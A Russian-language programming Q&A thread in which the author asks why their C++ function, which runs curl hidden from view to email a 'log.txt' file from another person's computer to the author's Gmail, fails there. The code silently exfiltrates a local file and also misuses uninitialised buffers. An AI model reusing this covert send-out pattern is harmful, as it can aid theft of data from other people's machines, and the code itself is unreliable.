# curl не отправляет email на чужом компьютере

Tags: c++, c, curl, cmd

Программа использует curl для отправки текстового файла по email, работает у меня идеально,всё выполняется,имейл приходит(пробовал даже логиниться через другого юзера в Windows),но вот когда я запускаю на другом компьютере,ничего не происходит,я пробовал и через админа запускать,ничего не помогает,всё работает до момента отправки по email.Curl клал в одну и ту же папку с основной программой.Вроди бы и от директории не зависит,потому что я определяю её с помощью `_getcwd()`,может там какие-то проблемы с доступом есть,не могу понять.
Функция,отсылающая email.

```
bool sendemail()
{
    //определяем расположение файла log.txt 
    /*все strcat для того чтоб сформировать команду,шаблон которой          
    закомментирован ниже*/
    char current_work_dir[700];
    char clonedir[250];
    char clonedir3[250];
    strcat(clonedir3,"\"");
    _getcwd(current_work_dir, sizeof(current_work_dir));
    _getcwd(clonedir, sizeof(clonedir));
    strcat(clonedir3,clonedir);
    strcat(clonedir3,"\\log.txt\" -k --anyauth");
    printf("%s",current_work_dir);
    strcat(current_work_dir,"\\curl smtp://smtp.gmail.com:587 -v --mail-from \"andybelous2@gmail.com\" --mail-rcpt \"andybelous2@gmail.com\" --ssl -u andybelous2@gmail.com:Password pishu -T ");
    strcat(current_work_dir,clonedir3);
    //char* command = "curl smtp://smtp.gmail.com:587 -v --mail-from \"SENDER.EMAIL@gmail.com\" --mail-rcpt \"RECEIVER.EMAIL@gmail.com\" --ssl -u SENDER.EMAIL@gmail.com:PASSWORD -T \"ATTACHMENT.FILE\" -k --anyauth";
    WinExec(current_work_dir, SW_HIDE);
    FreeConsole();
    Sleep(5000);
    return true;
}
```

Comment: А вручную Вы пробовали эти команды выполнять?

Comment: @alexolut нет,не имел возможности,т.к. компьютер не мой.

Comment: Надо проверять. Т.к. к c/c++ проблема вряд ли имеет какое-то отношение.

Comment: @alexolut А вот если в шаблоне пишется \"ATTACHMENT.FILE\" то мне писать \"C:\...\log.txt\" или C:\....\log.txt?

Comment: А вы проверяли то что пути папок были не больше 255 длинной? Иногда на машинах их засовывают достаточно далеко и из-за этого может быть обвал. Но в общем вам надо пользоваться отладкой.

Comment: Добавьте вывод на экран или в файл значения используемых переменных. Потом попросите эти значения вам предоставить, раз уж явного доступа к компьютеру нет.

Comment: Я добавил вываод и нашел,что проблема была в том,что у пользователя русские буквы в пути были и кажется еще  что-то с буфером в промежуточных действиях ставало не так,исправил и заработало

Comment: @alexolut Простите,я сам должен в этом случае ответить на свой вопрос или оставить его так?

Comment: @andybelous2 Будет лучше, если Вы напишите ответ, о том как решили проблему. Именно в форме ответа, а не комментария.

Comment: Автор, а вы пробовали а) использовать библиотеку libcurl, б) использовать функции с суффиксом `_at` и в) обрабатывать ошибки? В текущем виде код просто ужас по всем возможным параметрам. Только обфускатора не хватает...